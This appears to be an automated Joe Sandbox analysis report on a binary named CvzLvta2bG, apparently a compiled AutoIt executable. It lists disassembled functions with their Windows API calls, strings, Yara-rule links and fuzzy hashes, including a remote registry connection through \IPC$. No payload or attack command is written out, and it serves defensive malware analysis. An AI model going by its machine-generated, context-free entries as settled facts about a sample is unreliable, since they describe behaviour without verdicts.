Instruction Fuzzy Hash: F131F4B1D4831A6ADF109FB68C8999FBFE8FF04754F50452AE50DF7281DA7865008FA1

Function 00E8A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E8A259
DestroyWindow.USER32(?,?), ref: 00E8A2D3

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E8A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E8A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A382
DestroyWindow.USER32(00000000), ref: 00E8A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E00000,00000000), ref: 00E8A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A3F4
GetDesktopWindow.USER32 ref: 00E8A40D
GetWindowRect.USER32(00000000), ref: 00E8A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E8A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E8A444

Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC

Strings

tooltips_class32, xrefs: 00E8A346, 00E8A3D4
0, xrefs: 00E8A26F

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 449b7358463150c16088676e4e42261ecce96fa230a4cca206e690864cd19502
Instruction ID: 9accd3c133808646f65f11376e4af99cb810e9ac7c0ca59a0bf4d678083e022e
Opcode Fuzzy Hash: 449b7358463150c16088676e4e42261ecce96fa230a4cca206e690864cd19502
Instruction Fuzzy Hash: 4771C171140204AFEB24DF28CC49F6A77E6FB88304F08452DF99DA72A0D771E94ADB52

Function 00E84392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E84424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E8446F

Strings

CHECK, xrefs: 00E8448F
GETSELECTED, xrefs: 00E8457F
EXISTS, xrefs: 00E844D8
EXPAND, xrefs: 00E84521
COLLAPSE, xrefs: 00E844B5
UNCHECK, xrefs: 00E8464B
SELECT, xrefs: 00E84620
GETTOTALCOUNT, xrefs: 00E84456
GETTEXT, xrefs: 00E845C2
ISCHECKED, xrefs: 00E845F2
GETITEMCOUNT, xrefs: 00E84551

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 4e48fd46fda4329c75368fe518b0a393bcf1a92bc4b130c33a163adeb561f767
Instruction ID: bdd0d605bf75c2ffc1dde49353d541034d9571de53d6a9fa8a82fa2049750ab3
Opcode Fuzzy Hash: 4e48fd46fda4329c75368fe518b0a393bcf1a92bc4b130c33a163adeb561f767
Instruction Fuzzy Hash: C4913BB02043119BCB04EF10C451AAEB7E1EF95354F44A869E89A7B3E3DB31ED49CB91

Function 00E8B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E8B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E891C2), ref: 00E8B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E8B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B9C3
FreeLibrary.KERNEL32(?), ref: 00E8B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E8B9DF
DestroyIcon.USER32(?,?,?,?,?,00E891C2), ref: 00E8B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E8BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E8BA17

Part of subcall function 00E22EFD: __wcsicmp_l.LIBCMT ref: 00E22F86

Strings

.icl, xrefs: 00E8B82A
.exe, xrefs: 00E8B84A
.dll, xrefs: 00E8B86D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 67e788c1fdad07bda7d4d6a16fbf1f810a575f2bcdd006a85eac8818c0e44469
Instruction ID: fdac2a920d22e019541a57c2a3ca7dd2476bae82a9f20576939341d339c94cef
Opcode Fuzzy Hash: 67e788c1fdad07bda7d4d6a16fbf1f810a575f2bcdd006a85eac8818c0e44469
Instruction Fuzzy Hash: 8861F071900215BEEB18EF64DC41FBE7BACEB08710F10811AFA19F61D1DB749994DBA0

Function 00E6A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

CharLowerBuffW.USER32(?,?), ref: 00E6A3CB
GetDriveTypeW.KERNEL32 ref: 00E6A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A4C5

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

Strings

close cd wait, xrefs: 00E6A4B0
open, xrefs: 00E6A3F2
closed, xrefs: 00E6A3DF, 00E6A3E8
wait, xrefs: 00E6A482
set cd door , xrefs: 00E6A466
type cdaudio alias cd wait, xrefs: 00E6A443
close, xrefs: 00E6A3D1
open , xrefs: 00E6A427

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 52d1857ba765ed0ad16eb843fb25cf355923249e81b2f5db709787463db87c1b
Instruction ID: d8fca62e88eaab3e3a379563053067e924d6bd36845f2482c0d1aa1aee1a1154
Opcode Fuzzy Hash: 52d1857ba765ed0ad16eb843fb25cf355923249e81b2f5db709787463db87c1b
Instruction Fuzzy Hash: A1514B715043059FC700EF10C99186BB7E8EF94758F04A86DF89A772A2DB31AD4ACF52

Function 00E5F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00E3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00E5F8DF
LoadStringW.USER32(00000000,?,00E3E029,00000001), ref: 00E5F8E8

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00E3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00E5F90A
LoadStringW.USER32(00000000,?,00E3E029,00000001), ref: 00E5F90D
__swprintf.LIBCMT ref: 00E5F95D
__swprintf.LIBCMT ref: 00E5F96E
_wprintf.LIBCMT ref: 00E5FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E5FA2E

Strings

Line %d:, xrefs: 00E5F968
Error: , xrefs: 00E5F9E5
%s (%d) : ==> %s: %s %s, xrefs: 00E5FA12
Line %d (File "%s"):, xrefs: 00E5F957
^ ERROR, xrefs: 00E5F9C3

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: f3bb591d2b924554ceb330295a15602782ce041c26e351141ea7a7ea2e2b64db
Instruction ID: 2fb9c485aaaea2394f28237cb5a5380ef45b16cad78fc4ccff5f6633fde830a3
Opcode Fuzzy Hash: f3bb591d2b924554ceb330295a15602782ce041c26e351141ea7a7ea2e2b64db
Instruction Fuzzy Hash: 0D412C72C04219AACF04FBE0DD86DEEB7B8AF58301F502465F605761A2EA356F49CB61

Function 00E8BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E89207,?,?), ref: 00E8BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA85
GlobalLock.KERNEL32(00000000), ref: 00E8BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00E8BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00E92CAC,?), ref: 00E8BAD7
GlobalFree.KERNEL32(00000000), ref: 00E8BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00E8BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00E8BB36
DeleteObject.GDI32(00000000), ref: 00E8BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E8BB74

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: b802d86205420bc6c2c7284adc4a364a930b17b106044138b3cf85cf93bb58a8
Instruction ID: d16925126450d1fd4a4a81436a87bb36583e3e332eb30714595c770bce9505b6
Opcode Fuzzy Hash: b802d86205420bc6c2c7284adc4a364a930b17b106044138b3cf85cf93bb58a8
Instruction Fuzzy Hash: 05410975600204EFDB119FA6DC88EAABBB8FB89715F104169F90DE7261D7309D05DB60

Function 00E6D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00E6DA10
_wcscat.LIBCMT ref: 00E6DA28
_wcscat.LIBCMT ref: 00E6DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E6DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DA63
GetFileAttributesW.KERNEL32(?), ref: 00E6DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00E6DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DAA7

Strings

*.*, xrefs: 00E6DAE6

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 5ab1ed6779d1690849c439a2f30650965c56e6c1acfb9b8431cbb85382ff7ade
Instruction ID: 641926b964d6b47f7854f1bed2b54d0643f8b8f8659e13911a8ca7bb356dbbd8
Opcode Fuzzy Hash: 5ab1ed6779d1690849c439a2f30650965c56e6c1acfb9b8431cbb85382ff7ade
Instruction Fuzzy Hash: 9081C571A483009FCB24DF64DC449AAB7E4BFC9394F58AC2EF489EB251D670D944CB52

Function 00E8C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E8C1FC
GetFocus.USER32 ref: 00E8C20C
GetDlgCtrlID.USER32(00000000), ref: 00E8C217
_memset.LIBCMT ref: 00E8C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E8C36D
GetMenuItemCount.USER32(?), ref: 00E8C38D
GetMenuItemID.USER32(?,00000000), ref: 00E8C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E8C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E8C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E8C489

Strings

0, xrefs: 00E8C33A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 68c3ae1e65eb37fbf17d1341ea167fb4e5fb3256a03f5fda7287fb5209a0fced
Instruction ID: 0813d992180ffa69d52be2e2f19249ba9e261f9c0c535f24fd0e763a95c7240d
Opcode Fuzzy Hash: 68c3ae1e65eb37fbf17d1341ea167fb4e5fb3256a03f5fda7287fb5209a0fced
Instruction Fuzzy Hash: A2819E712083019FD710EF14D894A6BBBE4FB89318F20592EF99DB72A1D770D945CB62

Function 00E7731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E7738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E7739B
CreateCompatibleDC.GDI32(?), ref: 00E773A7
SelectObject.GDI32(00000000,?), ref: 00E773B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E77408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E77444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E77468
SelectObject.GDI32(00000006,?), ref: 00E77470
DeleteObject.GDI32(?), ref: 00E77479
DeleteDC.GDI32(00000006), ref: 00E77480
ReleaseDC.USER32(00000000,?), ref: 00E7748B

Strings

(, xrefs: 00E77410

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ac7d7965523af98220aca2ab9dd90daa40e8dd69a434ff229410f1093aa84798
Instruction ID: 0374e428d7a9dd63cb1fb46b06af37859a148e6d7505738d98ca8e633c55f5a5
Opcode Fuzzy Hash: ac7d7965523af98220aca2ab9dd90daa40e8dd69a434ff229410f1093aa84798
Instruction Fuzzy Hash: E5514775904309EFCB14CFA9CC84EAEBBB9EF48310F148529F99AA7251D731A944DB50

Function 00E06A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00E20957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E06B0C,?,00008000), ref: 00E20973

Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00E06CFA

Part of subcall function 00E0586D: _wcscpy.LIBCMT ref: 00E058A5

Part of subcall function 00E2363D: _iswctype.LIBCMT ref: 00E23645

Strings

AU3!, xrefs: 00E06B61
EA06, xrefs: 00E3E452
Error opening the file, xrefs: 00E3E43D, 00E3E4B8
Bad directive syntax error, xrefs: 00E3E79D
Unterminated string, xrefs: 00E3E7E4
>>>AUTOIT SCRIPT<<<, xrefs: 00E3E496
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00E3E421

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 051db78ca32faa0bac72c6915bffde1c68189fb8a7d0703bda873a766c9185ff
Instruction ID: 3df62ccec88ad97b8d2b9f44d145e4ca0eee0a266fa9d61d3a4b57e307a6ec7f
Opcode Fuzzy Hash: 051db78ca32faa0bac72c6915bffde1c68189fb8a7d0703bda873a766c9185ff
Instruction Fuzzy Hash: 32029E711083419FC714EF24C881AAFBBE5AF98314F14681EF4D6A72E1DB30D989CB52

Function 00E62D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E62D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E62DDD
GetMenuItemCount.USER32(00EC5890), ref: 00E62E66
DeleteMenu.USER32(00EC5890,00000005,00000000,000000F5,?,?), ref: 00E62EF6
DeleteMenu.USER32(00EC5890,00000004,00000000), ref: 00E62EFE
DeleteMenu.USER32(00EC5890,00000006,00000000), ref: 00E62F06
DeleteMenu.USER32(00EC5890,00000003,00000000), ref: 00E62F0E
GetMenuItemCount.USER32(00EC5890), ref: 00E62F16
SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E62F4C
GetCursorPos.USER32(?), ref: 00E62F56
SetForegroundWindow.USER32(00000000), ref: 00E62F5F
TrackPopupMenuEx.USER32(00EC5890,00000000,?,00000000,00000000,00000000), ref: 00E62F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E62F7E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 71b0aa543aed634c5eb33d82196979b2553368ec59aea592700fc86520e54926
Instruction ID: 44dc1bcfafd68e28909b6725a5e5fae3b997602f97dbf87f838f7c9f3c5c9709
Opcode Fuzzy Hash: 71b0aa543aed634c5eb33d82196979b2553368ec59aea592700fc86520e54926
Instruction Fuzzy Hash: E1710770681A05BEEB228F54EC49FAABF64FF043A8F10122AF719BA1E1C7725C10D751

Function 00E788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E788D7
CoInitialize.OLE32(00000000), ref: 00E78904
CoUninitialize.OLE32 ref: 00E7890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00E78A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00E78B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E92C0C), ref: 00E78B6F
CoGetObject.OLE32(?,00000000,00E92C0C,?), ref: 00E78B92
SetErrorMode.KERNEL32(00000000), ref: 00E78BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E78C25
VariantClear.OLEAUT32(?), ref: 00E78C35

Strings

,,, xrefs: 00E788C1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,
API String ID: 2395222682-1556401989
Opcode ID: 5baa075a0a5322fecc3685b7232f139b2a7942c7b12e363bc148ee35d755a85a
Instruction ID: a499d19b95de1ec91906fa749e4b492901538e40e3c53b5a0c81fcab0f20848e
Opcode Fuzzy Hash: 5baa075a0a5322fecc3685b7232f139b2a7942c7b12e363bc148ee35d755a85a
Instruction Fuzzy Hash: 07C146B1608305AFC704DF64C98892BB7E9FF99348F00992DF989AB251DB31ED05CB52

Function 00E577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

_memset.LIBCMT ref: 00E5786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E578A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E578BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E578D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E57902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E5792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E57935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E5793A

Strings

\CLSID, xrefs: 00E57822
\IPC$, xrefs: 00E57882
SOFTWARE\Classes\, xrefs: 00E5780C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

